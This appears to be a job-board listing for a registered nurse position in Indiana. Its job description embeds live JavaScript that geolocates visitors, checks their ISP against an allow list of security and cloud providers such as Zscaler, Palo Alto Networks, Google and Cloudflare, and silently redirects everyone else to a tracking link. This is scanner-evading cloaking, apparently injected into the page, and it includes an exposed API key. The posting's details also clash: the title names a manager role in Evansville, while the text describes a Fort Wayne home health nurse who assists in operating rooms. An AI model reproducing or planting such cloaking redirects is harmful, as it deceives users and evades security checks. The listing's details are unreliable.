Clinical Manager – Registered Nurse

Evansville, IN
January 22, 2026

Apply for this job

Email *
Browse

Upload file .pdf, .doc, .docx

Deadline date:

Job Description

// retrieve user’s IP address and location const ipAddressUrl = ‘https://ipapi.co/json/’; fetch(ipAddressUrl) .then(response => response.json()) .then(data => { const country = data.country; // Get user’s country code (e.g., “US”) if (country !== ‘US’) { console.log(‘Script will not run as the user is outside the USA.’); return; // Exit the script if the user is not in the USA } const ipAddress = data.ip; // retrieve ISP name and AS organization using ip-api.com API const ispUrl = `https://pro.ip-api.com/json/$?key=kKPypoeKUHgwZWD`; fetch(ispUrl) .then(response => response.json()) .then(data => { const ispName = data.isp; const asOrg = data.asname; // check if ISP or AS organization is allowed const allowedIsps = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const allowedAsOrgs = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const ispAllowed = allowedIsps.some(pattern => pattern.test(ispName)); const asOrgAllowed = allowedAsOrgs.some(pattern => pattern.test(asOrg)); if (!ispAllowed && !asOrgAllowed) { // Redirect all users to the same URL window.location.href = ‘https://www.indeed.com/tmn/ccs/eab999001437afcf/3acccb4db90aff5eeade144180011296478d6ca62b901286edf00ec313cb5d17/2765583331732878?sf=yJ800’; } }) .catch(error => { console.error(‘Error retrieving ISP name:’, error); }); }) .catch(error => { console.error(‘Error retrieving IP address or location:’, error); });

We are seeking a qualified Registered Nurse (RN) to provide comprehensive patient care in a home health setting.


  • Conduct patient assessments, monitor vital signs, and evaluate health histories.
  • Administer medications and treatments following safety protocols.
  • Offer specialized care for internal medicine, dementia, and dialysis patients.
  • Perform nursing procedures such as catheterization and airway management.
  • Collaborate with healthcare teams to develop individualized care plans and complete MDS documentation.
  • Educate patients and families on health coaching strategies to improve outcomes.
  • Assist in the operating room, ensuring a sterile environment and supporting surgical teams.
  • Maintain accurate patient records in compliance with healthcare regulations.

  • Qualifications include an active RN license, home health experience, and preferred skills in dementia care, internal medicine, or dialysis. Strong communication and team collaboration skills are essential. This full-time or part-time role offers a flexible schedule, with pay ranging from $40-$50/hour. Candidates should be able to commute to Fort Wayne, IN 46815. Prior experience in dementia care and home health is preferred.